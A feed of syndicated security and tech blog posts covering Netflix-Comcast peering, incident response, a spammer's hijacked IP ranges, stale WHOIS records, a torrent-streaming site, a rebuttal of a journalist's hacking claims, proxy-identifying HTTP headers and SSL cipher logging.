Descriptions of the NetFlix-Comcast issue completely ignore the technical details, but the technical details matter. For one thing, it doesn’t stream “across the Internet”. The long-distance links between cities cannot support that level of traffic. Instead, NetFlix puts servers in every major city to stream from. These servers are often co-located in the same building as Comcast’s major peering points.

In other words, what we are often talking about is how to get video streaming from NetFlix servers from one end of a building to another.

During prime time (7pm to 10pm), NetFlix’s bandwidth requirements are many times greater than all non-video traffic put together. That essentially means that companies like Comcast have to specially engineer their networks just to handle NetFlix. So far, NetFlix has been exploiting loopholes in “peering agreements” designed for non-video traffic in order to get a free ride.

Re-architecting the Internet to make NetFlix work requires a lot of money. Right now, those costs are born by all Comcast subscribers — even those who don’t watch NetFlix. The 90% of customers with low-bandwidth needs are subsidizing those 10% who watch NetFlix at prime time. We like to think of Comcast as having monopolistic power, but it doesn’t. The truth is that Comcast has very little power in pricing. It can’t meter traffic, charging those who abuse the network during prime time to account for their costs. Thus, instead of charging NetFlix abusers directly, it just passes its costs to NetFlix.

Converting the Internet into a public-utility wouldn’t change this. It simply means that instead of fighting in the market place, the Comcast-NetFlix battle would be decided by regulators. And, the result of the decision would be whichever company did the best job lobbying the FCC and paying off politicians — which would probably be Comcast.

Schneier on Security: The Future of Incident Response

This post was syndicated from: Schneier on Security and was written by: moderator. Original post: at Schneier on Security

Security is a combination of protection, detection, and response. It’s taken the industry a long time to get to this point, though. The 1990s was the era of protection. Our industry was full of products that would protect your computers and network. By 2000, we realized that detection needed to be formalized as well, and the industry was full of detection products and services.

This decade is one of response. Over the past few years, we’ve started seeing incident response (IR) products and services. Security teams are incorporating them into their arsenal because of three trends in computing. One, we’ve lost control of our computing environment. More of our data is held in the cloud by other companies, and more of our actual networks are outsourced. This makes response more complicated, because we might not have visibility into parts of our critical network infrastructures.

Two, attacks are getting more sophisticated. The rise of APT (advanced persistent threat)–attacks that specifically target for reasons other than simple financial theft–brings with it a new sort of attacker, which requires a new threat model. Also, as hacking becomes a more integral part of geopolitics, unrelated networks are increasingly collateral damage in nation-state fights.

And three, companies continue to under-invest in protection and detection, both of which are imperfect even under the best of circumstances, obliging response to pick up the slack.

Way back in the 1990s, I used to say that “security is a process, not a product.” That was a strategic statement about the fallacy of thinking you could ever be done with security; you need to continually reassess your security posture in the face of an ever-changing threat landscape.

At a tactical level, security is both a product and a process. Really, it’s a combination of people, process, and technology. What changes are the ratios. Protection systems are almost technology, with some assistance from people and process. Detection requires more-or-less equal proportions of people, process, and technology. Response is mostly done by people, with critical assistance from process and technology.

Usability guru Lorrie Faith Cranor once wrote, “Whenever possible, secure system designers should find ways of keeping humans out of the loop.” That’s sage advice, but you can’t automate IR. Everyone’s network is different. All attacks are different. Everyone’s security environments are different. The regulatory environments are different. All organizations are different, and political and economic considerations are often more important than technical considerations. IR needs people, because successful IR requires thinking.

This is new for the security industry, and it means that response products and services will look different. For most of its life, the security industry has been plagued with the problems of a lemons market. That’s a term from economics that refers to a market where buyers can’t tell the difference between good products and bad. In these markets, mediocre products drive good ones out of the market; price is the driver, because there’s no good way to test for quality. It’s been true in anti-virus, it’s been true in firewalls, it’s been true in IDSs, and it’s been true elsewhere. But because IR is people-focused in ways protection and detection are not, it won’t be true here. Better products will do better because buyers will quickly be able to determine that they’re better.

The key to successful IR is found in Cranor’s next sentence: “However, there are some tasks for which feasible, or cost effective, alternatives to humans are not available. In these cases, system designers should engineer their systems to support the humans in the loop, and maximize their chances of performing their security-critical functions successfully.” What we need is technology that aids people, not technology that supplants them.

The best way I’ve found to think about this is OODA loops. OODA stands for “observe, orient, decide, act,” and it’s a way of thinking about real-time adversarial situations developed by US Air Force military strategist John Boyd. He was thinking about fighter jets, but the general idea has been applied to everything from contract negotiations to boxing–and computer and network IR.

Speed is essential. People in these situations are constantly going through OODA loops in their head. And if you can do yours faster than the other guy–if you can “get inside his OODA loop”–then you have an enormous advantage.

We need tools to facilitate all of these steps:

  • Observe, which means knowing what’s happening on our networks in real time. This includes real-time threat detection information from IDSs, log monitoring and analysis data, network and system performance data, standard network management data, and even physical security information–and then tools knowing which tools to use to synthesize and present it in useful formats. Incidents aren’t standardized; they’re all different. The more an IR team can observe what’s happening on the network, the more they can understand the attack. This means that an IR team needs to be able to operate across the entire organization.
  • Orient, which means understanding what it means in context, both in the context of the organization and the context of the greater Internet community. It’s not enough to know about the attack; IR teams need to know what it means. Is there a new malware being used by cybercriminals? Is the organization rolling out a new software package or planning layoffs? Has the organization seen attacks form this particular IP address before? Has the network been opened to a new strategic partner? Answering these questions means tying data from the network to information from the news, network intelligence feeds, and other information from the organization. What’s going on in an organization often matters more in IR than the attack’s technical details.
  • Decide, which means figuring out what to do at that moment. This is actually difficult because it involves knowing who has the authority to decide and giving them the information to decide quickly. IR decisions often involve executive input, so it’s important to be able to get those people the information they need quickly and efficiently. All decisions need to be defensible after the fact and documented. Both the regulatory and litigation environments have gotten very complex, and decisions need to be made with defensibility in mind.
  • Act, which means being able to make changes quickly and effectively on our networks. IR teams need access to the organization’s network–all of the organization’s network. Again, incidents differ, and it’s impossible to know in advance what sort of access an IR team will need. But ultimately, they need broad access; security will come from audit rather than access control. And they need to train repeatedly, because nothing improves someone’s ability to act more than practice.

Pulling all of these tools together under a unified framework will make IR work. And making IR work is the ultimate key to making security work. The goal here is to bring people, process and, technology together in a way we haven’t seen before in network security. It’s something we need to do to continue to defend against the threats.

This essay originally appeared in IEEE Security & Privacy.

Krebs on Security: Still Spamming After All These Years

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A long trail of spam, dodgy domains and hijacked Internet addresses leads back to a 37-year-old junk email purveyor in San Diego who was the first alleged spammer to have been criminally prosecuted 13 years ago for blasting unsolicited commercial email.

atballLast month, security experts at Cisco blogged about spam samples caught by the company’s SpamCop service, which maintains a blacklist of known spam sources. When companies or Internet service providers learn that their address ranges are listed on spam blacklists, they generally get in touch with the blacklister to determine and remediate the cause for the listing (because usually at that point legitimate customers of the blacklisted company or ISP are having trouble sending email).

In this case, a hosting firm in Ireland reached out to Cisco to dispute being listed by SpamCop, insisting that it had no spammers on its networks. Upon investigating further, the hosting company discovered that the spam had indeed come from its Internet addresses, but that the addresses in question weren’t actually being hosted on its network. Rather, the addresses had been hijacked by a spam gang.

Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker (for another example of IP address hijacking, also known as “network identity theft,” check out this story I wrote for The Washington Post back in 2008).

So who’s benefitting from the Internet addresses wrested from the Irish hosting company? According to Cisco, the addresses were hijacked by Mega-Spred and Visnet, hosting providers in Bulgaria and Romania, respectively. But what of the spammers using this infrastructure?

One of the domains promoted in the spam that caused this ruckus — unmetegulzoo[dot]com — leads to some interesting clues. It was registered recently by a Mike Prescott in San Diego, to the email address mikeprescott7777@gmail.com. That email was used to register more than 1,100 similarly spammy domains that were recently seen in junk email campaigns (for the complete list, see this CSV file compiled by DomainTools.com).

Enter Ron Guilmette, an avid anti-spam researcher who tracks spammer activity not by following clues in the junk email itself but by looking for patterns in the way spammers use the domains they’re advertising in their spam campaigns. Guilmette stumbled on the domains registered to the Mike Prescott address while digging through the registration records on more than 14,000 spam-advertised domains that were all using the same method (Guilmette asked to keep that telltale pattern out of this story so as not to tip off the spammers, but I have seen his research and it is solid).

persaud-fbOf the 5,000 or so domains in that bunch that have accessible WHOIS registration records, hundreds of them were registered to variations on the Mike Prescott email address and to locations in San Diego. Interestingly, one email address found in the registration records for hundreds of domains advertised in this spam campaign was registered to a “michaelp77x@gmail.com” in San Diego, which also happens to be the email address tied to the Facebook account for one Michael Persaud in San Diego.

Persaud is an unabashed bulk emailer who’s been sued by AOL, the San Diego District Attorney’s office and by anti-spam activists multiple times over the last 15 years. Reached via email, Persaud doesn’t deny registering the domains in question, and admits to sending unsolicited bulk email for a variety of “clients.” But Persaud claims that all of his spam campaigns adhere to the CAN-SPAM Act, the main anti-spam law in the United States — which prohibits the sending of spam that spoofs that sender’s address and which does not give recipients an easy way to opt out of receiving future such emails from that sender.

As for why his spam was observed coming from multiple hijacked Internet address ranges, Persaud said he had no idea.

“I can tell you that my company deals with many different ISPs both in the US and overseas and I have seen a few instances where smaller ones will sell space that ends up being hijacked,” Persaud wrote in an email exchange with KrebsOnSecurity. “When purchasing IP space you assume it’s the ISP’s to sell and don’t really think that they are doing anything illegal to obtain it. If we find out IP space has been hijacked we will refuse to use it and demand a refund. As for this email address being listed with domain registrations, it is done so with accordance with the CAN-SPAM guidelines so that recipients may contact us to opt-out of any advertisements they receive.”

Guilmette says he’s not buying Persaud’s explanation of events.

“He’s trying to make it sound as if IP address hijacking is a very routine sort of thing, but it is still really quite rare,” Guilmette said.

The anti-spam crusader says the mere fact that Persaud has admitted that he deals with many different ISPs both in the US and overseas is itself telling, and typical of so-called “snowshoe” spammers — junk email purveyors who try to avoid spam filters and blacklists by spreading their spam-sending systems across a broad swath of domains and Internet addresses.

“The vast majority of all legitimate small businesses ordinarily just find one ISP that they are comfortable with — one that provides them with decent service at a reasonable prince — and then they just use that” to send email, Guilmette said. “Snowshoe spammers who need lots of widely dispersed IP space do often obtain that space from as many different ISPs, in the US and elsewhere, as they can.”

Persaud declined to say which companies or individuals had hired him to send email, but cached copies of some of the domains flagged by Cisco show the types of businesses you might expect to see advertised in junk email: payday loans, debt consolidation services, and various nutraceutical products.

In 1998, Persaud was sued by AOL, which charged that he committed fraud by using various names to send millions of get-rich-quick spam messages to America Online customers. In 2001, the San Diego District Attorney’s office filed criminal charges against Persaud, alleging that he and an accomplice crashed a company’s email server after routing their spam through the company’s servers. In 2000, Persaud admitted to one felony count (PDF) of stealing from the U.S. government, after being prosecuted for fraud related to some asbestos removal work that he did for the U.S. Navy.

Many network operators remain unaware of the threat of network address hijacking, but as Cisco notes, network administrators aren’t completely helpless in the fight against network-hijacking spammers: Resource Public Key Infrastructure (RPKI) can be leveraged to prevent this type of activity. Another approach known as DNSSEC can also help.

SANS Internet Storm Center, InfoCON: green: Whois someone else?, (Tue, Nov 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A couple of weeks ago, I already covered the situation where a cloud IP address gets re-assigned, and the new owner still sees some of your traffic. Recently, one of our clients had the opposite problem: They had changed their Internet provider, and had held on to the old address range for a decent decay time. They even confirmed with a week-long packet capture that there was no afterglow on the link, and then dismantled the setup.

Until last week, when they got an annoyed rant into their abuse@ mailbox, accusing them of hosting an active spam operation. The guy on duty in the NOC didnt notice the IP address at first (it was still familiar to him), and he triggered their incident response team, who then rather quickly confirmed: Duh, this aint us!

A full 18 months after the old ISP contract expired, it turns out that their entire contact information was still listed in the WHOIS record for that old netblock. After this experience, we ran a quick check on ~20 IP ranges that we knew whose owner had changed in the past two years, and it looks like this problem is kinda common: Four of them were indeed still showing old owner and contact information in whois records.

So, if you change IPs, dont just keep the afterglow in mind, also remember to chase your former ISP until all traces of your contact information are removed from the public records associated with that network.

If you have @!#%%%! stories to share about stale whois information, feel free to use the comments below, or our contacts form.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Joker is Cool But Not the New Popcorn Time

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

While BitTorrent’s underlying technology has remained mostly unchanged over the past decade, innovators have found new ways to make it more presentable. Torrent clients have developed greatly and private tracker systems such as What.cd’s Gazelle have shown that content can be enhanced with superior cataloging and indexing tools.

This is where Popcorn Time excelled when it debuted earlier this year. While it was the same old torrent content underneath, the presentation was streets ahead of anything seen before. With appetites whetted, enthused BitTorrent fans have been waiting for the next big thing ever since.

Recently news circulated of a new service which in several headlines yesterday was heralded as the new Popcorn Time. Joker.org is a web-based video service with super-clean presentation. It’s premise is straightforward – paste in a magnet link or upload a torrent file from your computer then sit back and enjoy the show.

joker-1

Not only does Joker work, it does so with elegance. The interface is uncluttered and intuitive and the in-browser window can be expanded to full screen. Joker also provides options for automatically downloading subtitles or uploading your own, plus options for skipping around the video at will.

While these features are enough to please many visitors to the site, the big questions relate to what is going on under the hood.

Popcorn Time, if we’re forced to conduct a comparison, pulls its content from BitTorrent swarms in a way that any torrent client does. This means that the user’s IP address is visible both to the tracker and all related peers. So, has Joker successfully incorporated a torrent client into a web browser to enable live video streaming?

Last evening TF put that question to the people behind Joker who said they would answer “soon”. Hours later though and we’re still waiting so we’ll venture that the short answer is “no”.

Decentralized or centralized? That is the question..

The most obvious clues become evident when comparing the performance of popular and less popular torrents after they’ve been added to the Joker interface. The best seeded torrents not only tend to start immediately but also allow the user to quickly skip to later or earlier parts of the video. This suggests that the video content has been cached already and isn’t being pulled live and direct from peers in a torrent swarm.

Secondly, torrents with less seeds do not start instantly. We selected a relatively poorly seeded torrent of TPB AFK and had to wait for the Joker progress bar to wind its way to 100% before we could view the video. That took several minutes but then played super-smoothly, another indication that content is probably being cached.

joker-2

To be absolutely sure we’d already hooked up Wireshark to our test PC in advance of initiating the TPB AFK download. If we were pulling content from a swarm we might expect to see the IP addresses of our fellow peers sending us data. However, in their place were recurring IP addresses from blocks operated by the same UK ISP hosting the Joker website.

Conclusion

Joker is a nice website that does what it promises extremely well and to be fair to its creators they weren’t the ones making the Popcorn Time analogies. However, as a free service Joker faces a dilemma.

By caching video itself the site is bound by the usual bandwidth costs associated with functionally similar sites such as YouTube. While Joker provides greater flexibility (users can order it to fetch whichever content they like) it still has to pump video directly to users after grabbing it from torrent swarms. This costs money and at some point someone is going to have to pay.

In contrast, other than running the software download portal and operating the APIs, Popcorn Time has no direct video-related bandwidth costs since the user’s connection is being utilized for transfers. The downside is that users’ IP addresses are visible to the outside world, a problem Joker users do not have.

Finally and to address the excited headlines, comparing Joker to Popcorn Time is premature. The site carries no colorful and easy to access indexes of movies which definitely makes it a lot less attractive to newcomers. That being said, this lack of content curation enhances Joker’s legal footing.

Overall, demand is reportedly high. The developers told TF last evening that they were “overloaded” and were working hard to fix issues. Currently the service appears stable. Only time will tell how that situation develops.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Errata Security: No evidence feds hacked Attkisson

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

Former CBS journalist Sharyl Attkisson is coming out with a book claiming the government hacked her computer in order to suppress reporting on Benghazi. None of her “evidence” is credible. Instead, it’s bizarre technobabble. Maybe her book is better, but those with advance copies quoting excerpts  make it sound like the worst “ninjas are after me” conspiracy theory.

Your electronics are not possessed by demons

Technology doesn’t work by magic. Each symptom has a specific cause.

Attkisson says “My television is misbehaving. It spontaneously jitters, mutes, and freeze-frames”. This is not a symptom of hackers. Instead, it’s a common consumer complaint caused by the fact that cables leading to homes (and inside the home) are often bad. My TV behaves like this on certain channels.

She says “I call home from my mobile phone and it rings on my end, but not at the house”, implying that her phone call is being redirected elsewhere. This is a common problem with VoIP technologies. Old analog phones echoed back the ring signal, so the other side had to actually ring for you to hear it. New VoIP technologies can’t do that. The ringing is therefore simulated and has nothing to do with whether it’s ringing on the other end. This is a common consumer complaint with VoIP systems, and is not a symptom of hacking.

She says that her alarm triggers at odd hours in the night. Alarms work over phone lines and will trigger when power is lost on the lines (such as when an intruder cuts them). She implies that the alarm system goes over the VoIP system on the FiOS box. The FiOS box losing power or rebooting in the middle of the night can cause this. This is a symptom of hardware troubles on the FiOS box, or Verizon maintenance updating the box, not hackers.

She says that her computer made odd “Reeeeee” noises at 3:14am. That’s common. For one thing, when computers crash, they’ll make this sound. I woke two nights ago to my computer doing this, because the WiMax driver crashed, causing the CPU to peg at 100%, causing the computer to overheat and for the fan to whir at max speed. Other causes could be the nightly Timemachine backup system. This is a common symptom of bugs in the system, but not a symptom of hackers.

It’s not that hackers can’t cause these problems, it’s that they usually don’t. Even if hackers have thoroughly infested your electronics, these symptoms are still more likely to be caused by normal failure than by the hackers themselves. Moreover, even if a hacker caused any one of these symptoms, it’s insane to think they caused them all.

Hacking is not sophisticated

There’s really no such thing as a “sophisticated hack“. That’s a fictional trope, used by people who don’t understand hacking. It’s like how people who don’t know crypto use phrases like “military grade encryption” — no such thing exists, the military’s encryption is usually worse than what you have on your laptop or iPhone.

Hacking is rarely sophisticated because the simplest techniques work. Once I get a virus onto your machine, even the least sophisticated one, I have full control. I can view/delete all your files, view the contents of your screen, control your mouse/keyboard, turn on your camera/microphone, and so on. Also, it’s trivially easy to evade anti-virus protection. There’s no need for me to do anything particularly sophisticated.

We are experts are jaded and unimpressed. Sure, we have experience with what’s normal hacking, and might describe something as abnormal. But here’s the thing: ever hack I’ve seen has had something abnormal about it. Something strange that I’ve never seen before doesn’t make a hack “sophisticated”.

Attkisson quotes an “expert” using the pseudonym “Jerry Patel” saying that the hack is “far beyond the abilities of even the best nongovernment hackers”. Government hackers are no better than nongovernment ones — they are usually a lot worse. Hackers can earn a lot more working outside government. Government hackers spend most of their time on paperwork, whereas nongovernment hackers spend most of their time hacking. Government hacker skills atrophy, while nongovernment hackers get better and better.

That’s not to say government hackers are crap. Some are willing to forgo the larger paycheck for a more stable job. Some are willing to put up with the nonsense in government in order to be able to tackle interesting (and secret) problems. There are indeed very good hackers in government. It’s just that it’s foolish to assume that they are inherently better than nongovernmental ones. Anybody who says so, like “Jerry Patel”, is not an expert.

Contradictory evidence

Attkisson quotes one expert as saying intrusions of this caliber are “far beyond the the abilities of even the best nongovernment hackers”, while at the same time quoting another expert saying the “ISP address” is a smoking gun pointing to a government computer.

Both can’t be true. Hiding ones IP address is the first step in any hack. You can’t simultaneously believe that these are the most expert hackers ever for deleting log files, but that they make the rookie mistake of using their own IP address rather than anonymizing it through Tor or a VPN. It’s almost always the other way around: everyone (except those like the Chinese who don’t care) hides their IP address first, and some forget to delete the log files.

Attkisson quotes experts saying non-expert things. Patel’s claims about logfiles and government hackers are false. Don Allison’s claims about IP addresses being a smoking gun is false. It may be that the people she’s quoting aren’t experts, or that her ignorance causes her to misquote them.

Technobabble

Attkisson quotes an expert as identifying an “ISP address” of a government computer. That’s not a term that has any meaning. He probably meant “IP address” and she’s misquoting him.

Attkisson says “Suddenly data in my computer file begins wiping at hyperspeed before my very eyes. Deleted line by line in a split second”. This doesn’t even make sense. She claims to have videotaped it, but if this is actually a thing, it sounds like more something kids do to scare people, not what real “sophisticated” hackers do. Update: she has released the video, the behavior is identical to a stuck delete/backspace key, and not evidence of hackers.

So far, none of the quotes I’ve read from the book use any technical terminology that I, as an expert, feel comfortable with.

Lack of technical details

We don’t need her quoting (often unnamed) experts to support her conclusion. Instead, she could just report the technical details.

For example, instead of quoting what an expert says about the government IP address, she could simply report the IP address. If it’s “75.748.86.91”, then we can judge for ourselves whether it’s the address of a government computer. That’s important because nobody I know believes that this would be a smoking gun — maybe if we knew more technical details she could change our minds.

Maybe that’s in her book, along with pictures of the offending cable attached to the FiOS ONT, or the pictures of her screen deleting at “hyperspeed”. So far, though, none of those with advanced copies have released these details.

Lastly, she’s muzzled the one computer security “expert” that she named in the story so he can’t reveal any technical details, or even defend himself against charges that he’s a quack.

Conclusion

Attkisson’s book isn’t out yet. The source material for this post if from those with advance copies quoting her [1]][2]. But, everything quoted so far is garbled technobabble from fiction rather that hard technical facts.


Disclosure: Some might believe this post is from political bias instead of technical expertise. The opposite is true. I’m a right-winger. I believe her accusations that CBS put a left-wing slant on the news. I believe the current administration is suppressing information about the Benghazi incident. I believe journalists with details about Benghazi have been both hacked and suppressed. It’s just that in her case, her technical details sounds like a paranoid conspiracy theory.

TorrentFreak: Lawfirm Chasing Aussie ‘Pirates’ Discredited IP Address Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

There are many explanations for the existence of online piracy, from content not being made available quickly enough to it being sold at ripoff prices. Unfortunately for Australians, over the years most of these complaints have had some basis in fact.

The country is currently grappling with its piracy issues and while there’s hardly a consensus of opinion right now, most of the region’s rightsholders feel that suing the general public isn’t the way to go. It’s painful for everyone involved and doesn’t solve the problem.

That said, US-based Dallas Buyers Club LLC are not of the same opinion. They care about money and to that end they’re now attempting to obtain the identities of iiNet users for the purpose of extracting cash settlements from them.

Yesterday additional information on the case became available. An Optus spokeswoman told SMH that it had been contacted by Dallas Buyers Club about handing over subscriber data but its legal representatives had backed off when it was denied. The movie outfit didn’t even try with Telstra – but why?

So-called copyright trolls like the easiest possible fight and through iiNet they know their adversaries just that little bit better. According to Anny Slater of Slaters Intellectual Property Lawyers, documents revealed in the ISP’s earlier fight with Village Roadshow show that Telstra could well be a more difficult target for discovery.

The business model employed by plaintiffs such as Dallas Buyer’s Club LLC (DBCLLC) requires a minimum of ‘difficult’ since difficulties increase costs and decrease profits. To that end, part of the job of keeping things straightforward will fall to DBCLLC’s lawfirm, Sydney-based Marque Lawyers.

Unfortunately for DBCLLC, Marque Lawyers have already shot themselves in the foot when it comes to convincing DBCLLC’s “pirate” targets to “pay up or else.”

In 2012, Marque published a paper titled “It wasn’t me, it was my flatmate! – a defense to copyright infringement?” which detailed the company’s stance on file-sharing accusations. The publication provided a short summary of cases in the US where porn companies were aiming to find out the identities of people who had downloaded their films, just as Dallas Buyers Club – Marque’s clients – are doing now.

“To find out the actual identities of the users, the [porn companies] asked the Court to force the ISPs to reveal the names and addresses of each of the subscribers to which the IP addresses related. The users went on the attack and won,” Marque explained.

And here’s the line all potential targets of Dallas Buyers Club and Marque Lawyers should be aware of – from the lawfirm’s own collective mouth.

“The judge, rightly in our view, agreed with the users that just because an IP address is in one person’s name, it does not mean that that person was the one who illegally downloaded the porn.

As the judge said, an IP address does not necessarily identify a person and so you can’t be sure that the person who pays for a service has necessarily infringed copyright.

This decision makes a lot of sense to us. If it holds up, copyright
owners will need to be a whole lot more savvy about how they identify and pursue copyright infringers and, perhaps, we’ve seen the end of the mass ‘John Doe’ litigation.”

So there you have it. Marque Lawyers do not have faith in the IP address-based evidence used in mass file-sharing litigation. In fact, they predict that weaknesses in IP address evidence might even signal the end of mass lawsuits.

Sadly they weren’t right in their latter prediction, as their partnership with Dallas Buyers Club reveals. Still, their stance that the evidence is weak remains and will probably come back to bite them.

The document is available for download from Marque’s own server. Any bill payers wrongly accused of piracy by the company in the future may like to refer the lawfirm to its own literature as part of their response.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: By Proxy

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As I tweak and tune the firewall and IDS system at FotoForensics, I keep coming across unexpected challenges and findings. One of the challenges is related to proxies. If a user uploads prohibited content from a proxy, then my current system bans the entire proxy. An ideal solution would only ban the user.

Proxies serve a lot of different purposes. Most people think about proxies in regards to anonymity, like the TOR network. TOR is a series of proxies that ensure that the endpoint cannot identify the starting point.

However, there are other uses for proxies. Corporations frequently have a set of proxies for handling network traffic. This allows them to scan all network traffic for potential malware. It’s a great solution for mitigating the risk from one user getting a virus and passing it to everyone in the network.

Some governments run proxies as a means to filter content. China and Syria come to mind. China has a custom solution that has been dubbed the “Great Firewall of China“. They use it to restrict site access and filter content. Syria, on the other hand, appears to use a COTS (commercial off-the-shelf) solution. In my web logs, most traffic from Syria comes through Blue Coat ProxySG systems.

And then there are the proxies that are used to bypass usage limits. For example, your hotel may charge for Internet access. If there’s a tech convention in the hotel, then it’s common to see one person pay for the access, and then run his own SOCKS proxy for everyone else to relay out over the network. This gives everyone access without needing everyone to pay for the access.

Proxy Services

Proxy networks that are designed for anonymity typically don’t leak anything. If I ban a TOR node, then that node stays banned since I cannot identify individual users. However, the proxies that are designed for access typically do reveal something about the user. In fact, many proxies explicitly identify who’s request is being relayed. This added information is stuffed in HTTP header fields that most web sites ignore.

For example, I recently received an HTTP request from 66.249.81.4 that contained the HTTP header “X-Forwarded-For: 82.114.168.150″. If I were to ban the user, then I would ban “66.249.81.4”, since that system connected to my server. However, 66.249.81.4 is google-proxy-66-249-81-4.google.com and is part of a proxy network. This proxy network identified who was relaying with the X-Forwarded-For header. In this case, “82.114.168.150” is someone in Yemen. If I see this reference, then I can start banning the user in Yemen rather than the Google Proxy that is used by lots of people. (NOTE: I changed the Yemen IP address for privacy, and this user didn’t upload anything requiring a ban; this is just an example.)

Unfortunately, there is no real standard here. Different proxies use different methods to denote the user being relayed. I’ve seen headers like “X-Forwarded”, “X-Forwarded-For”, “HTTP_X_FORWARDED_FOR” (yes, they actually sent this in their header; this is NOT from the Apache variable), “Forwarded”, “Forwarded-For-IP”, “Via”, and more. Unless I know to look for it, I’m liable to ban a proxy rather than a user.

In some cases, I see the direct connection address also listed as the relayed address; it claims to be relaying itself. I suspect that this is cause by some kind of anti-virus system that is filtering network traffic through a local proxy. And sometimes I see private addresses (“private” as in “private use” and “should not be routed over the Internet”; not “don’t tell anyone”). These are likely home users or small companies that run a proxy for all of the computers on their local networks.

Proxy Detection

If I cannot identify the user being proxied, then just identifying that the system is a proxy can be useful. Rather than banning known proxies for three months, I might ban the proxy for only a day or a week. The reduced time should cut down on the number of people blocked because of the proxy that they used.

There are unique headers that can identify that a proxy is present. Blue Coat ProxySG, for example, adds in a unique header: “X-BlueCoat-Via: abce6cd5a6733123″. This tracking ID is unique to the Blue Coat system; every user relaying through that specific proxy gets the same unique ID. It is intended to prevent looping between Blue Coat devices. If the ProxySG system sees its own unique ID, then it has identified a loop.

Blue Coat is not the only vendor with their own proxy identifier. Fortinet’s software adds in a “X-FCCKV2″ header. And Verizon silently adds in an “X-UIDH” header that has a large binary string for tracking users.

Language and Location

Besides identifying proxies, I can also identify the user’s preferred language.

The intent with specifying languages in the HTTP header is to help web sites present content in the native language. If my site supports English, German, and French, then seeing a hint that says “French” should help me automatically render the page using French. However, this can be used along with IP address geolocation to identify potential proxies. If the IP address traces to Australia but the user appears to speak Italian, then it increases the likelihood that I’m seeing an Australian proxy that is relaying for a user in Italy.

The official way to identify the user’s language is to use an HTTP “Accept-Language” header. For example, “Accept-Language: en-US,en;q=0.5″ says to use the United States dialect of English, or just English if there is no dialect support at the web site. However, there are unofficial approaches to specifying the desired language. For example, many web browsers encode the user’s preferred language into the HTTP user-agent string.

Similarly, Facebook can relay network requests. These appear in the header “X-Facebook-Locale”. This is an unofficial way to identify when Facebook being use as a proxy. However, it also tells me the user’s preferred language: “X-Facebook-Locale: fr_CA”. In this case, the user prefers the Canadian dialect of French (fr_CA). While the user may be located anywhere in the world, he is probably in Canada.

There’s only one standard way to specify the recipient’s language. However, there are lots of common non-standard ways. Just knowing what to look for can be a problem. But the bigger problem happens when you see conflicting language definitions.

Accept-Language: de-de,de;q=0.5

User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; it-it; SAMSUNG SM-G900F/G900FXXU1ANH4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36

X-Facebook-Locale: es_LA

x-avantgo-clientlanguage: en_GB

x-ucbrowser-ua: pf(Symbian);er(U);la(en-US);up(U2/1.0.0);re(U2/1.0.0);dv(NOKIAE90);pr
(UCBrowser/9.2.0.336);ov(S60V3);pi(800*352);ss(800*352);bt(GJ);pm(0);bv(0);nm(0);im(0);sr(2);nt(1)

X-OperaMini-Phone-UA: Mozilla/5.0 (Linux; U; Android 4.4.2; id-id; SM-G900T Build/id=KOT49H.G900SKSU1ANCE) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

If I see all of these in one request, then I’ll probably choose the official header first (German from German). However, without the official header, would I choose Spanish from Latin America (“es-LA” is unofficial but widely used), Italian from Italy (it-it) as specified by the web browser user-agent string, or the language from one of those other fields? (Fortunately, in the real world these would likely all be the same. And you’re unlikely to see most of these fields together. Still, I have seen some conflicting fields.)

Time to Program!

So far, I have identified nearly a dozen different HTTP headers that denote some kind of proxy. Some of them identify the user behind the proxy, but others leak clues or only indicate that a proxy was used. All of this can be useful for determining how to handle a ban after someone violates my site’s terms of service, even if I don’t know who is behind the proxy.

In the near future, I should be able to identify at least some of these proxies. If I can identify the people using proxies, then I can restrict access to the user rather than the entire proxy. And if I can at least identify the proxy, then I can still try to lessen the impact for other users.

SANS Internet Storm Center, InfoCON: green: Logging SSL, (Thu, Oct 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With POODLE behind us, it is time to get ready for the next SSL firedrill. One of the questions that keeps coming up is which ciphers and SSL/TLS versions are actually in use. If you decide to turn off SSLv3 or not depends a lot on who needs it, and it is an important answer to have ready should tomorrow some other cipher turn out to be too weak.

But keep in mind that it is not just numbers that matter. You also need to figure out who the outliers are and how important (or dangerous?) they are. So as a good start, try to figure out how to log SSL/TLS versions and ciphers. There are a couple of options to do this:

In Apache, you can log the protocol version and cipher easily by logging the respective environment variable [1] . For example:
CustomLog logs/ssl_request_log %t %h {User-agent}i%{SSL_PROTOCOL}x %{SSL_CIPHER}x

Logs SSL protocol and cipher. You can add this to an existing access log, or create a new log. If you decide to log this in its own log, I suggest you add User-Agent and IP Address (as well as time stamp).

In nginx, you can do the same by adding$ssl_cipher $ssl_protocolto the log_format directive in your nginx configuration. For example:

log_format ssl $remote_addr $http_user_agent $ssl_cipher $ssl_protocol

Should give you a similar result as for apache above.

If you have a packet sniffer in place, you can also use tshark to extract the data. With t-shark, you can actually get a bit further. You can log the client hello with whatever ciphers the client proposed, and the server hello which will indicate what cipher the server picked.

